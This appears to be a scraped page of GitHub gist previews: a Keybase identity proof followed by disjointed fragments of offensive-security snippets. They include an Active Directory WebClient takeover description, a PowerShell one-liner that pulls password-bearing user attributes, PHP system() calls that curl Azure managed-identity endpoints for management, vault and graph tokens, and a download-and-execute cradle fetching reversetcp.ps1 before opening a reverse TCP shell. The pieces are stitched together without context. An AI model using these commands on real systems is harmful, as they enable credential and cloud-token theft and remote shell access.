I hereby claim:
- I am c0axx on github.
- I am c0axx (https://keybase.io/c0axx) on keybase.
- I have a public key ASCQzho6XeMDopSCjSDM6aK-1ZgLmvNSEWiFP0b3BwHI-Ao
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
$users = Get-NetUser; $props=@(); $users | Get-Member | foreach-object{if($_.Name -notlike "badpassword*"){$props+=$_.Name}}; foreach($user in $users){ foreach($prop in $props){ if($user.$prop -like "*password*" -and $user.$prop -notlike "*dont_expire_password" -and $user.$prop -notlike "*RODC Password*"){Write-Output ($user.samAccountName + "[" + $prop + "]" + " : " + $user.$prop) } } } |
<?php | |
system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER'); | |
?> |
<?php | |
system('curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER'); | |
?> |
<?php | |
system('curl "$IDENTITY_ENDPOINT?resource=https://graph.windows.net/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER'); | |
?> |
Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/605.1.15 (KHTML, | |
like Gecko) Version/15.3 Safari/605.1.15 Edg/100.0.4896.127 |
iex (New-Object | |
Net.Webclient).downloadstring("http://10.0.10.X/reversetcp.ps1") | |
Invoke-PowerShellTcp -Reverse -IPAddress 10.0.10.X -Port 8888 |
#!/usr/bin/env bash | |
set -o errexit | |
set -o nounset | |
set -o pipefail | |
echo "[*] Creating temporary directory..." | |
TMPDIR="$(mktemp -d --suffix=_bloodhound-customqueries)" | |
# Compass BloodHound Customqueries |